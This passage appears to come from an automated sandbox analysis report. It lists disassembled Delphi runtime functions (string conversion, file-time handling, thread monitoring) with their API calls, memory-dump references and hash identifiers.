                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteStringiSysutils@Type$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2787194164-0
                                                                                                  • Opcode ID: eec2c889b96c63f28c6d912a4f2a099ea762f16bceb9a5f7ed7734ac0c1a855f
                                                                                                  • Instruction ID: f94e552c94311d6681ea6b9088efd7c55080737d05d2957480002ee94c899e9e
                                                                                                  • Opcode Fuzzy Hash: eec2c889b96c63f28c6d912a4f2a099ea762f16bceb9a5f7ed7734ac0c1a855f
                                                                                                  • Instruction Fuzzy Hash: 9C11BE38B03A96DBDF01DEB8EA825AEB3F9EF442407A086B5E500D3161E770EE01D750
                                                                                                  Function 50015A28 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015AB9), ref: 50015A64
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015AB9), ref: 50015A7B
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,50015AB9), ref: 50015A93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$AnsiFromStr$qqrr20StringStringx27System@%T$us$i0$%$InternalLength$qqrr20Move$qqrpxvpviStringi
                                                                                                  • String ID:
                                                                                                  • API String ID: 986796861-0
                                                                                                  • Opcode ID: 10025f9b933ecd5712bc93f26f254c4d90db7b168fed868ef1a57108d806b3bb
                                                                                                  • Instruction ID: 273e415b261a473a3476493ac361f3ac1f54f6cd7220035dc33fede40ddaa886
                                                                                                  • Opcode Fuzzy Hash: 10025f9b933ecd5712bc93f26f254c4d90db7b168fed868ef1a57108d806b3bb
                                                                                                  • Instruction Fuzzy Hash: F3110031740284DFEB04CBA9DDD29AAB3F9EF996007E4037AE904CB311EB70DE408691
                                                                                                  Function 500095F4 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(?,?,?), ref: 50009611
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?,?), ref: 5000964A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$CharClr$qqrpvFreeFromLen$qqrr17StringStringpbiSystem@Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 4035486651-0
                                                                                                  • Opcode ID: 58788c31a9392e6549bcfa84bf31123cf4ff7a055d905c796c92d66516e9aead
                                                                                                  • Instruction ID: f7e519a3914915a7ddd12a0a43312b4a76140a576ef5cdbbdeb6b3b112df9300
                                                                                                  • Opcode Fuzzy Hash: 58788c31a9392e6549bcfa84bf31123cf4ff7a055d905c796c92d66516e9aead
                                                                                                  • Instruction Fuzzy Hash: 9111CE31B0564957AB00DAA9D8E18CFB2DA9FA8210B944337BA04E3312DEB6DE4447D0
                                                                                                  Function 50027888 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50027895
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278C2
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278EE
                                                                                                  • @Sysutils@ByteToCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027920), ref: 50027903
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50027927), ref: 5002791A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$ByteCharClr$qqrpvIndex$qqrx27Ref$qqrpvSysutils@T$us$i0$%i
                                                                                                  • String ID:
                                                                                                  • API String ID: 4214602929-0
                                                                                                  • Opcode ID: 5a3c4d89908cf0cf4437ecb80cfc5886c6d8491ff44f0f31cfd21df03d7b4b82
                                                                                                  • Instruction ID: c3c75d1b48e19cc3e1f6b6390753f07d084fbfb0e8c4f9dbf7f6214b8e7eb97a
                                                                                                  • Opcode Fuzzy Hash: 5a3c4d89908cf0cf4437ecb80cfc5886c6d8491ff44f0f31cfd21df03d7b4b82
                                                                                                  • Instruction Fuzzy Hash: D511A030B01286EFAB05DFB8EB5697DB3F9EB482007A04275E508D3655EB70EE40D750
                                                                                                  Function 50027930 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027968
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027992
                                                                                                  • @Sysutils@ByteToCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 500279A7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteCharIndex$qqrx20StringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1663083771-0
                                                                                                  • Opcode ID: 68e17aca844da68af2cac0459f8ec52d04a034524aca00c230a62bba0d0821d2
                                                                                                  • Instruction ID: aa1a79b2077093aec0dc215978b6579e0673518319e3e08c2949f697f48abfbb
                                                                                                  • Opcode Fuzzy Hash: 68e17aca844da68af2cac0459f8ec52d04a034524aca00c230a62bba0d0821d2
                                                                                                  • Instruction Fuzzy Hash: EC112E30701286DFAF01CFAAEA42969B7F9EB88200BA042B6E508D3655E770EE40D650
                                                                                                  Function 5000A164 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Unicode$Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringStringi$AnsiAsg$qqrr20FreeFromMem$qqrpvMem$qqrrpviReallocStr$qqrr20String$qqriStringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 87712638-0
                                                                                                  • Opcode ID: b2517f3e29e0c2378a26b9be41a75c938c5ddf139d7f123da371e61d7ede2628
                                                                                                  • Instruction ID: 79869a9546d8ae15c7d4563ffc226c392f69356ca43a144d6d3bba8582a221f3
                                                                                                  • Opcode Fuzzy Hash: b2517f3e29e0c2378a26b9be41a75c938c5ddf139d7f123da371e61d7ede2628
                                                                                                  • Instruction Fuzzy Hash: C901B5347435A14BFB18E649D471B6AB3F3AFD6210FE4C71AA6058B249DAB09C41C782
                                                                                                  Function 5001C048 Relevance: 7.6, APIs: 5, Instructions: 54timefileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 5001C059
                                                                                                  • GetLastError.KERNEL32(?,?), ref: 5001C062
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$Array$qqrr20DateErrorFindFromLastLocalNextStringpbiSystem@System@@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2911837428-0
                                                                                                  • Opcode ID: d772afcc146df195d284147fd921b47fd2c998ab065165d502e497404e87112c
                                                                                                  • Instruction ID: 5728537e3c39e6084da27139d89328dfbbaad40690f3e6d11adc8d77ec81f8e3
                                                                                                  • Opcode Fuzzy Hash: d772afcc146df195d284147fd921b47fd2c998ab065165d502e497404e87112c
                                                                                                  • Instruction Fuzzy Hash: D6115BB26041809FDB45DFA8D8C1C87B3ECAF8C21075586A2ED48DF24AE630D9508BA1
                                                                                                  Function 5001A744 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A7D5), ref: 5001A780
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A7D5), ref: 5001A79F
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A7D5), ref: 5001A7BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                  • String ID:
                                                                                                  • API String ID: 983657741-0
                                                                                                  • Opcode ID: 8f8e674ff806139dc7915cbd04f5f4ac68111c59e7e358a9f3dc38c30ea9b737
                                                                                                  • Instruction ID: 6fc85c46829d5016a76dc39be3afba1c4c63ccbbd777daa4708c9c8809dd5562
                                                                                                  • Opcode Fuzzy Hash: 8f8e674ff806139dc7915cbd04f5f4ac68111c59e7e358a9f3dc38c30ea9b737
                                                                                                  • Instruction Fuzzy Hash: 89116534A04298EFDB11DFA8DD9199DB7F8EF4A210B6043B6E500D36D1E7749F80D681
                                                                                                  Function 50007734 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 50007749
                                                                                                    • Part of subcall function 50007234: GetCurrentThreadId.KERNEL32 ref: 50007238
                                                                                                    • Part of subcall function 50007234: @System@Error$qqr20System@TRuntimeError.RTL120 ref: 50007243
                                                                                                  • @System@TMonitor@QueueWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(00000000,500077CE), ref: 50007773
                                                                                                  • @System@TMonitor@Exit$qqrv.RTL120(00000000,500077CE), ref: 50007781
                                                                                                    • Part of subcall function 500074A4: @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 500074AA
                                                                                                    • Part of subcall function 500074A4: @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500074D9
                                                                                                  • @System@TMonitor@Enter$qqrui.RTL120(?), ref: 500077A2
                                                                                                    • Part of subcall function 5000730C: @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                    • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007343
                                                                                                    • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007355
                                                                                                  • @System@TMonitor@RemoveWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(?), ref: 500077AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Monitor@$Thread$CheckCountOwningThread$qqrvTickWaiter$qqrr30Waiting$CurrentEnter$qqruiEnter$qqrvErrorError$qqr20Event$qqrvExit$qqrvQueueRemoveRuntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 3245137772-0
                                                                                                  • Opcode ID: c8d6062a3806072e0c5270ae9d5596829130f44f1f64b0f71c9e445ccb500201
                                                                                                  • Instruction ID: 9226aa66a553e5a02f3549cd2e7d24c02f66a86d0b6f512f8c85fedbd385ecc6
                                                                                                  • Opcode Fuzzy Hash: c8d6062a3806072e0c5270ae9d5596829130f44f1f64b0f71c9e445ccb500201
                                                                                                  • Instruction Fuzzy Hash: 19114F74E016849FEB00CFB8DE9445EBBF4EF4871075586A9E819E7352D778AD00CBA0
                                                                                                  Function 500283D4 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028410
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 5002842B
                                                                                                  • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028439
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3042977434-0
                                                                                                  • Opcode ID: 35d1e42feb42f13eecb656c74661683a5158f8c6915138d9e1fd8d021dc4de57
                                                                                                  • Instruction ID: 36fcfea0c2849a8d324b642c74e4cb449ffd548fbf6f67616c7ea078cdc77676
                                                                                                  • Opcode Fuzzy Hash: 35d1e42feb42f13eecb656c74661683a5158f8c6915138d9e1fd8d021dc4de57
                                                                                                  • Instruction Fuzzy Hash: A201F935A031979FEB00EFA4EC42599B3FAEF843007958772E904A3625E7399E00D350
                                                                                                  Function 5001A7E4 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A86A), ref: 5001A81D
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A86A), ref: 5001A837
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A86A), ref: 5001A84F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
